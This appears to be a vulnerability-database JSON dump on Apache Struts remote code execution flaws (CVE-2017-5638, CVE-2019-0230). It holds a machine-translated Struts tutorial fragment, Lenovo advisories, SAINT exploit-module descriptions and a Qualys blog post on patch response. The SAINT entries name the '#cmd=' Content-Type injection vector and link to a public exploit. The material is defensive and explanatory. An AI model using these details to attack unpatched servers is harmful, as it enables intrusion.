server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "lenovo": [{"lastseen": "2018-07-13T19:27:14", "description": "**Lenovo Security Advisory**: LEN-14200\n\n**Potential Impact:** Remote code execution\n\n**Scope of Impact: **Industry-Wide\n\n**CVE Identifier: **CVE-2017-5638\n\n**Summary Description:**\n\nLenovo V3700 V2, Lenovo V3700 V2 XP, Lenovo V5030/V5030F and Storwize V7000 for Lenovo storage devices contain a vulnerability in Apache Struts 2, an open source web application framework, that could allow an attacker to perform remote code execution with a maliciously-crafted Content-Type value. \n\n**Mitigation Strategy for Customers (what you should do to protect yourself):**\n\nLenovo recommends customers update using the latest firmware update bundle by following the instructions in the links below.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-09T00:00:00", "type": "lenovo", "title": "Apache Struts Open Source Framework Remote Code Execution - us", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-09T00:00:00", "id": "LENOVO:PS500093-NOSID", "href": "https://support.lenovo.com/us/en/product_security/len-14200", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-11-25T19:26:40", "description": "**Lenovo Security Advisory**: LEN-14200\n\n**Potential Impact:** Remote code execution\n\n**Scope of Impact: **Industry-Wide\n\n**CVE Identifier: **CVE-2017-5638\n\n**Summary Description:**\n\nLenovo V3700 V2, Lenovo V3700 V2 XP, Lenovo V5030/V5030F and Storwize V7000 for Lenovo storage devices contain a vulnerability in Apache Struts 2, an open source web application framework, that could allow an attacker to perform remote code execution with a maliciously-crafted Content-Type value. \n\n**Mitigation Strategy for Customers (what you should do to protect yourself):**\n\nLenovo recommends customers update using the latest firmware update bundle by following the instructions in the links below.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 6.0}, "published": "2017-06-09T00:00:00", "type": "lenovo", "title": "Apache Struts Open Source Framework Remote Code Execution - Lenovo Support US", "bulletinFamily": "info", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-09T01:36:21", "id": "LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500093-apache-struts-open-source-framework-remote-code-execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2023-12-06T16:28:12", "description": "Added: 03/16/2017 \nCVE: [CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>) \nBID: [96729](<http://www.securityfocus.com/bid/96729>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 improperly handles file upload. Remote attackers can execute arbitrary commands via a \"`**#cmd=**`\" string in a specially crafted Content-Type HTTP header. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) Struts 2.3.x series to Struts 2.3.32 or later, and Struts 2.5.x series to Struts 2.5.10.1 or later. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-045> \n<https://www.exploit-db.com/exploits/41570/> \n\n\n### Limitations\n\nExploit works on vulnerable versions of Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "saint", "title": "Apache Struts 2 Jakarta Multipart Parser file upload command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "SAINT:484D58D595B8F6CEE787306160971308", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_jakarta_file_upload_command_execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T16:52:04", "description": "Added: 03/16/2017 \nCVE: [CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>) \nBID: [96729](<http://www.securityfocus.com/bid/96729>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 improperly handles file upload. Remote attackers can execute arbitrary commands via a \"`**#cmd=**`\" string in a specially crafted Content-Type HTTP header. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) Struts 2.3.x series to Struts 2.3.32 or later, and Struts 2.5.x series to Struts 2.5.10.1 or later. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-045> \n<https://www.exploit-db.com/exploits/41570/> \n\n\n### Limitations\n\nExploit works on vulnerable versions of Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "saint", "title": "Apache Struts 2 Jakarta Multipart Parser file upload command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_jakarta_file_upload_command_execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:29", "description": "Added: 03/16/2017 \nCVE: [CVE-2017-5638](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) \nBID: [96729](<http://www.securityfocus.com/bid/96729>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 improperly handles file upload. Remote attackers can execute arbitrary commands via a \"`**#cmd=**`\" string in a specially crafted Content-Type HTTP header. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) Struts 2.3.x series to Struts 2.3.32 or later, and Struts 2.5.x series to Struts 2.5.10.1 or later. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-045> \n<https://www.exploit-db.com/exploits/41570/> \n\n\n### Limitations\n\nExploit works on vulnerable versions of Apache Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-16T00:00:00", "type": "saint", "title": "Apache Struts 2 Jakarta Multipart Parser file upload command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-16T00:00:00", "id": "SAINT:966010900F7632E797C552D31C2BB53A", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_jakarta_file_upload_command_execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T16:52:06", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T16:55:07", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:12", "description": "It\u2019s happening more and more. \n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/IMG_3180-1-600x690.jpg)_Gill Langston, a Qualys Director of Product Management, speaks at RSA Conference 2018_\n\nHigh profile vulnerabilities like Meltdown and Spectre are disclosed, and become headline-grabbing news not just in the technology press, but on general news outlets worldwide.\n\nEven if the vulnerabilities aren\u2019t associated with an attack, the news reports rattle C-level executives, who ask the security team for a plan to address the by now notorious bug, and pronto.\n\nOften, a counter-productive disruption of the normal vulnerability and patch management operations ensues, as those involved scramble to draft a response against the clock in a panic atmosphere, punctuated by confusion and finger-pointing.\n\n\u201cShould I just immediately be jumping and reacting? Should I start deploying patches, and then go from there? I\u2019m going to argue that that\u2019s not always the case,\u201d Gill Langston, a Product Management Director at Qualys, said Wednesday during a presentation at RSA Conference 2018.\n\n### The right approach\n\nWhat security teams should aim for is a coherent, appropriate and rational response plan that is grounded in a factual and comprehensive assessment of the situation, said Langston, whose presentation was titled \u201cThe Sky Is Falling! Responding Rationally to Headline Vulnerabilities.\u201d\n\n\u201cHow can I put this together and send something back to the C-level executives that says: \u2018This is my recommendation for now.\u2019 It may not always be to go deploy the patches,\u201d Langston said. \u201cCreate a plan, and then react, review and improve it over time.\u201d\n\nA key step in dealing effectively with this type of \u201cnews event\u201d vulnerabilities is to have a proper and solid vulnerability management and remediation program in place. That way, organizations are in a better position to do a precise risk assessment of disclosed bugs on a continuous basis, according to Langston.\n\nThis also means that when a high profile vulnerability is announced, security teams have a head start. That way, they don\u2019t have to go back to square one to ensure they are in fact identifying all assets before they can start to react.\n\nOrganizations will be able to pick the most appropriate course of action, which depending on the case, can be to patch right away, to mitigate when remediation is complex, or to monitor and wait before acting.\n\nBelow are three recent examples of each scenario.\n\n### Patch now, unless you \u201cwanna cry\u201d later\n\nMost organizations should have prioritized patching the vulnerability that was exploited by the WannaCry ransomware, way before the attack was unleashed, according to Langston. Instead, the [WannaCry attack](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) infected 300,000-plus systems and disrupted critical operations globally.\n\nMicrosoft disclosed the Windows vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in mid-March 2017 and made a patch available. At the time, Microsoft rated the vulnerability as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nThe vulnerability also had a number of other red flags that made it stand out as a particularly concerning one. In mid-April, the vulnerability became even more dangerous when the [Shadow Brokers hacker group](<https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools>) released an exploit for it called EternalBlue.\n\nSo organizations had a window of about two months to install the patch before WannaCry was unleashed in mid-May. Had most affected systems been patched, WannaCry\u2019s impact would have been minor.\n\n\u201cIn most cases, organizations that follow the standard patching cycle of 30 days, they were already protected. And two months in, you got a second shot at it,\u201d he said.\n\nLangston displayed a graph with Qualys vulnerability scanning data showing that between mid-March and mid-April, detection of affected devices spiked and gradually declined as organizations scanned and patched their systems.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide13.jpg)\n\nHowever, the number of vulnerable systems shoots up after the EternalBlue release, after organizations apparently expanded the initial scope of scanned IT assets. \n\nAnd there\u2019s an important lesson here. \u201cWhen you\u2019re dealing with a vulnerability that can jump around your network, if you\u2019re not identifying all of the assets, you\u2019re already behind the eight ball,\u201d he said.\n\nThe graph shows that widespread patching didn\u2019t fully kick in until after the WannaCry attacks began.\n\nFom WannaCry, Langston identified some key no-nos: A slow identification of all at-risk assets; a tendency by IT operations teams to treat all issues with similar urgency; and a complacency among end users to delay rebooting their machines to finish the patching process.\n\n### Strut your firewall\n\nLangston then discussed the Struts web application vulnerability that was exploited most famously at Equifax, leading to that consumer credit reporting agency's massive data breach. On the same day that Struts was disclosed, and a patch made available, an exploit was also released, so the risk was high.\n\nBecause web application vulnerabilities tend to be difficult to remediate, often requiring a rebuild and long testing cycles, Struts highlights the importance of mitigation. In this case, a good plan would have been to use a[ web application firewall,](<https://blog.qualys.com/technology/2017/03/09/qualys-waf-2-0-protects-against-critical-apache-struts2-vulnerability-cve-2017-5638?>) while patching was in progress, he said. \n\n### Meltdown and Spectre: All bark and no bite?\n\nThen there are the Spectre and Meltdown vulnerabilities, which caused widespread alarm upon their disclosure in early January of this year, but for which there are only ineffective proof-of-concept exploits so far.\n\nIn the panic that was created, vendors such as Microsoft and Intel released faulty patches that IT departments rushed to apply, only to have to react after they caused system problems, including data corruption and performance issues.\n\nQualys data of vulnerability scans for Meltdown shows an initial push to install OS patches, followed by a long plateau of inactivity, as organizations probably weighed the fact that there were no exploits, and that the patches were problematic.\n\nA big lesson from Meltdown and Spectre? \u201cJust because it\u2019s in the news doesn\u2019t mean it\u2019s an emergency,\u201d Langston said. In other words, it\u2019s an example of a scenario where the most prudent thing to do is to monitor the situation and wait, instead of rushing to patch.\n\n### Best practices\n\nLangston recommends these six tips for crafting the best response to a notoriously public vulnerability:\n\n * Identify high-risk vulnerabilities often\n * Track the specific risk to your organization\n * Determine the best course of action\n * Decide when to communicate with internal stakeholders\n * Update regularly\n * Work the plan and improve it\n\nIt\u2019s also key to get buy-in from all the teams that will be involved in drafting, approving and executing the plan, including executives, security operations, DevOps, and IT operations. \u201cBuild the playbook together,\u201d he said.\n\nThe response plan should have four main elements:\n\n * Preparation, which involves ensuring that all assets are identified, that the triggers are documented and that the communication outreach is built\n * Reaction, which involves working the playbook, deciding on the course of action (fix, wait or mitigate), and communicating with your users\n * Revision, which involves reviewing the outcomes of the executed plan, and identifying improvement areas\n * Improvement, which involves collaboration to refine the response, modifying the plan based on findings, and extending the plan to all high-severity vulnerabilities\n\nThis should all amount to a rational, measured response, instead of to a knee-jerk reaction that leads to erratic, misguided decisions and actions.\n\n\u201cIf you don\u2019t have some response plan, you end up bouncing off of each other, pointing fingers and slowing down the entire process,\u201d he said.\n\nBelow is a checklist template that Langston suggests could be helpful in analyzing how to best respond to a \u201cheadline vulnerability\u201d.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide36-1.jpg) \nHere\u2019s how that checklist might look when filled out by a hypothetical organization for the Meltdown vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide37.jpg)\n\nThis information can also be enriched and expanded using automated dashboards with threat feeds and other resources that are updated in real time and that allow security teams to do in depth analysis of relevant data.\n\nThe goal is that in the face of a headline-blaring vulnerability, organizations can come up with a well thought and sensible plan. \u201cA methodical approach leads to a rational response,\u201d Langston said.", "cvss3": {}, "published": "2018-04-19T23:00:03", "type": "qualysblog", "title": "The Sky Is Falling! Responding Rationally to Headline Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-19T23:00:03", "id": "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "href": "https://blog.qualys.com/news/2018/04/19/the-sky-is-falling-responding-rationally-to-headline-vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 